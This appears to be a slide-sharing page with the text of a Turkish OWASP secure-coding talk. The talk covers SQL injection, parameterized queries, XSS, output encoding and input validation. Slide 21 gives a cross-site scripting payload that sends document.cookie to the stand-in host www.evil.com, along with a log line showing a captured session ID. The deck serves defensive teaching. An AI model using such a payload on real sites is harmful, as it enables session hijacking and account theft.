Yrd. Doç. Dr. Yavuz Erdoğan
 
Suleyman Özarslan - 2014 Hackerların Yükselişi
Suleyman Özarslan - 2014 Hackerların YükselişiSuleyman Özarslan - 2014 Hackerların Yükselişi
Suleyman Özarslan - 2014 Hackerların Yükselişi
 
Canberk Bolat & Barış Vidin - İzleniyorsunuz
Canberk Bolat & Barış Vidin - İzleniyorsunuzCanberk Bolat & Barış Vidin - İzleniyorsunuz
Canberk Bolat & Barış Vidin - İzleniyorsunuz
 
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
 
Evren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığı
Evren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığıEvren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığı
Evren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığı
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
 
Can Deger - Ben Heykır Olcam
Can Deger - Ben Heykır OlcamCan Deger - Ben Heykır Olcam
Can Deger - Ben Heykır Olcam
 
Canberk Bolat - Alice Android Diyarında
Canberk Bolat - Alice Android DiyarındaCanberk Bolat - Alice Android Diyarında
Canberk Bolat - Alice Android Diyarında
 
Can Yıldızlı - Koryak Uzan - Fiziksel Sızma Testi (İntelRad)
Can Yıldızlı - Koryak Uzan - Fiziksel Sızma Testi (İntelRad)Can Yıldızlı - Koryak Uzan - Fiziksel Sızma Testi (İntelRad)
Can Yıldızlı - Koryak Uzan - Fiziksel Sızma Testi (İntelRad)
 

Dernier

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 

Dernier (20)

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 

Bünyamin Demir - Secure YourApp

  • 2. Bünyamin Demir ( @bunyamindemir ) – Lisans Kocaeli Üni. Matematik Bölümü – Yüksek Lisans Kocaeli Üni Fen-Bilimleri, Tez; Oracle Veritabanı Güvenliği – Uygulama Geliştirici – OWASP Türkiye Bölüm Lideri – Sızma Testleri Uzmanı • Web, Mobil, Network, SCADA, Wireless, Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi • Kaynak kod analizi – Eğitmen • Web/Mobil Uygulama Güvenlik Denetimi • Güvenli Kod Geliştirme • Veritabanı Güvenliği 2
  • 4. 4 Why is OWASP Special?
  • 5. • OWASP Top 10 • OWASP Zed Attack Proxy (ZAP) • OpenSAMM • Cheat Sheets • ESAPI • ASVS • Testing Guide • Development Guide 5 OWASP Projects
  • 6. 6 OWASP ZAP Proxy / WebScarab
  • 8. Application Security 8 Two weeks of ethical hacking Ten man-years of development Business Logic Flaws Code Flaws Security Errors
  • 13. Anatomy of SQL Injection Attack 13 sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “’ AND password = ‘” & Request (“password”) & ”’” What the developer intended: username = john password = password SQL Query: SELECT * FROM user_table WHERE username = ‘john’ AND password = ‘password’
  • 14. Anatomy of SQL Injection Attack 14 sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “ ’ AND password = ‘ ” & Request(“password”) & “ ’ ” (This is DYNAMIC SQL and Untrusted Input) What the developer did not intend is parameter values like: username = john password = SQL Query: SELECT * FROM user_table WHERE username = ‘john’ AND password = causes all rows in the users table to be returned!
  • 15. Bind Parameters (PHP) 15 $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
  • 16. Parametrized Query (.NET) 16 SqlConnection objConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader();
  • 17. Prepare Statement (Java) 17 String newName = request.getParameter("newName") ; String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
  • 20. Anatomy of XSS Attack 20 http://www.davshan.loc/friends.php?search=<abc> <p>Result for <b><abc></b> :0<p><br /> http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
  • 21. Anatomy of XSS Attack 21 <script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script> 187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....
  • 22. OWASP Java Encoder Project 22 <%-- Basic HTML Context --%> <body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body> <%-- HTML Attribute Context --%> <input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" /> <%-- Javascript Block context --%> <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg); </script> <%-- Javascript Variable context --%> <button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
  • 24. OWASP HTML Sanitizer Project 24 PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML);
  • 26. A4 – Insecure Direct Object References 26 • Attacker notices his acct parameter is 6065 ?acct=6065 • He modifies it to a nearby number ?acct=6066 • Attacker views the victim’s account information https://www.onlinebank.com/user?acct=6065
  • 27. Best way to SecureYourApp 27 Input Validation
  • 28. Input Validation - Java 28 public boolean validateUsername(String username) { String usernamePattern = "^[a-zA-Z0-9]{6,12}$"; if (username == null) { return false; } Pattern p = Pattern.compile(usernamePattern); Matcher m = p.matcher(username); if (!m.matches()) { return false; } return true; } if (!validateUsername(username)) { //invalid username }
  • 29. Input Validation - .NET 29 if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.s]{1,10}$")) { // sinif ismi uygun değildir }
  • 30. 30